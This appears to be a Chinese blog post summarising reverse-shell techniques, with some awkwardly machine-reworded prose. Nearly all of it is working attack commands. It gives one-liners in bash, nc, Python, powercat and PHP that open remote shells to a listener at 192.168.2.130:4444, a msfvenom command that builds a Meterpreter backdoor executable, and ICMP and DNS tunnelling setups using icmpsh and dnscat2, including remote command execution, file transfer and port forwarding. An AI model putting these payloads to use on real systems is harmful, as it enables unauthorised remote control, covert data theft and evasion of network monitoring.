发布于2022年11月4日2年前 反弹shell总结 1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&12.nc反弹nc -e /bin/sh 192.168.2.130 44443.pythonimport socket,subprocess,os s =socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(( "192.168.2.130" , 4444 )) os.dup2(s.fileno(), 0 ) os.dup2(s.fileno(), 1 ) os.dup2(s.fileno(), 2 ) p = subprocess.call([ "/bin/bash" , "-i" ])4.powercatImport-Module .\powercat.ps1 powercat -c 192.168.2.130 -p 4444 -e cmd.exe5.msf生成exe后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe6.php反弹shellphp -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'7.ICMP关闭icmp呼应,否则shell一直跳,恢复是0 sysctl -w net.ipv4.icmp_echo_ignore_all=1 python icmpsh_m.py 源 目标 python icmpsh_m.py 192.168.2.137 192.168.2.135在windows7运转:icmpsh.exe -t 192.168.2.1378.DNShttps://downloads.skullsecurity.org/dnscat2/这儿咱们运用dnscat2,这儿是下载的,分为windows和linux版本,服务端和客户端。并且引荐运用vs2008编译安装git clone https://github.com/iagox86/dnscat2.git cd dnscat2 cd server sudo gem install bundler bundle install sudo ruby ./dnscat2.rbkaliruby dnscat2.rb --dns host=0.0.0.0,port=53531 ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥) ruby dnscat2.rb xxx.comwindows7中:./dnscat --dns server=192.168.2.130,port=53531 ./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥) ./dnscat xxx.com衔接成功后查看记载挑选衔接运用shell回来挑选shell执行指令其他指令quit (退出控制台) kill(中断通道) set(设值,比方设置security=open) windows(列举出所有的通道) window -i(衔接某个通道) 衔接通道后,运用help相同能够看到其内支持的指令(单个指令后跟-h也会解释该指令): clear(清屏) delay(修改长途会话超时时间) exec(执行长途机上的程序) shell(得到一个反弹shell) download/upload(两头之间上传下载文件) supend(回来到上一层,等于快捷键ctrl+z)DNS地道转发listen 127.0.0.1:6666 192.168.2.135:80 本机的6666就能够拜访80端口
创建帐户或登录后发表意见